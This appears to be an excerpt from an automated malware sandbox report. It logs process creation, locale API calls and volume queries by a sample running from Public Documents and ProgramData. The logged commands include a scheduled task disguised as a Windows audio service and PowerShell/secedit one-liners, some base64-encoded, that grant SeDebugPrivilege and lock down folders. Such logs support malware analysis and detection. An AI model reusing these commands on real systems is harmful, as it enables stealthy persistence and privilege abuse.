Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml

Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.')) -force;"
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\data\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege3.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege3.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege3.')) -force;"
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "[io.file]::writeallbytes([io.path]::combine($env:temp, 'sedebugprivilege4.inf'), [convert]::frombase64string('//5bafuabgbpagmabwbkaguaxqanaaoavqbuagkaywbvagqazqa9ahkazqbzaa0acgbbafyazqbyahmaaqbvag4axqanaaoacwbpagcabgbhahqadqbyaguapqaiacqaqwbiaekaqwbbaecatwakaciadqakafiazqb2agkacwbpag8abga9adeadqakafsauabyagkadgbpagwazqbnaguaiabsagkazwboahqacwbdaa0acgbtaguarablagiadqbnafaacgbpahyaaqbsaguazwblacaapqagacoauwatadealqa1ac0amqa4aa0acga=')); secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege4.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege4.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege4.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege4.*')) -force;"
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.')) -force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.')) -force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\data\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege3.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege3.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege3.')) -force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "[io.file]::writeallbytes([io.path]::combine($env:temp, 'sedebugprivilege4.inf'), [convert]::frombase64string('//5bafuabgbpagmabwbkaguaxqanaaoavqbuagkaywbvagqazqa9ahkazqbzaa0acgbbafyazqbyahmaaqbvag4axqanaaoacwbpagcabgbhahqadqbyaguapqaiacqaqwbiaekaqwbbaecatwakaciadqakafiazqb2agkacwbpag8abga9adeadqakafsauabyagkadgbpagwazqbnaguaiabsagkazwboahqacwbdaa0acgbtaguarablagiadqbnafaacgbpahyaaqbsaguazwblacaapqagacoauwatadealqa1ac0amqa4aa0acga=')); secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege4.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege4.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege4.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege4.*')) -force;"
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.')) -force;"
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\data\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege3.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege3.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege3.')) -force;"
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "[io.file]::writeallbytes([io.path]::combine($env:temp, 'sedebugprivilege4.inf'), [convert]::frombase64string('//5bafuabgbpagmabwbkaguaxqanaaoavqbuagkaywbvagqazqa9ahkazqbzaa0acgbbafyazqbyahmaaqbvag4axqanaaoacwbpagcabgbhahqadqbyaguapqaiacqaqwbiaekaqwbbaecatwakaciadqakafiazqb2agkacwbpag8abga9adeadqakafsauabyagkadgbpagwazqbnaguaiabsagkazwboahqacwbdaa0acgbtaguarablagiadqbnafaacgbpahyaaqbsaguazwblacaapqagacoauwatadealqa1ac0amqa4aa0acga=')); secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege4.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege4.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege4.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege4.*')) -force;"
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.')) -force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.')) -force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\data\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege3.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege3.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege3.')) -force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "[io.file]::writeallbytes([io.path]::combine($env:temp, 'sedebugprivilege4.inf'), [convert]::frombase64string('//5bafuabgbpagmabwbkaguaxqanaaoavqbuagkaywbvagqazqa9ahkazqbzaa0acgbbafyazqbyahmaaqbvag4axqanaaoacwbpagcabgbhahqadqbyaguapqaiacqaqwbiaekaqwbbaecatwakaciadqakafiazqb2agkacwbpag8abga9adeadqakafsauabyagkadgbpagwazqbnaguaiabsagkazwboahqacwbdaa0acgbtaguarablagiadqbnafaacgbpahyaaqbsaguazwblacaapqagacoauwatadealqa1ac0amqa4aa0acga=')); secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege4.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege4.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege4.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege4.*')) -force;"

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	2_2_0000000180037058
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: _getptd,GetLocaleInfoA,	2_2_000000018003715C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: GetLocaleInfoA,	2_2_0000000180037244
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,	2_2_00000001800372F8
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: GetLocaleInfoA,	2_2_000000018003D408
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: GetLocaleInfoW,	2_2_000000018003A528
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,free,GetLocaleInfoA,	2_2_000000018003A584
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: _getptd,GetLocaleInfoA,	2_2_000000018003758C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: EnumSystemLocalesA,	2_2_000000018003769C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: EnumSystemLocalesA,	2_2_0000000180037730
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s,	2_2_000000018003779C
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: EnumSystemLocalesW,	32_2_00589E55
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetLocaleInfoW,	32_2_0058A448
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetLocaleInfoW,	32_2_0058A219
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: EnumSystemLocalesW,	32_2_00580E38
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: EnumSystemLocalesW,	32_2_00589EA0
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetLocaleInfoW,	32_2_0058135E
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	32_2_0058A342
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	32_2_0058A517
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: EnumSystemLocalesW,	32_2_00589F3B
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	32_2_00589FC6
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	32_2_00589BB3
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetLocaleInfoW,	32_2_00589DAE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
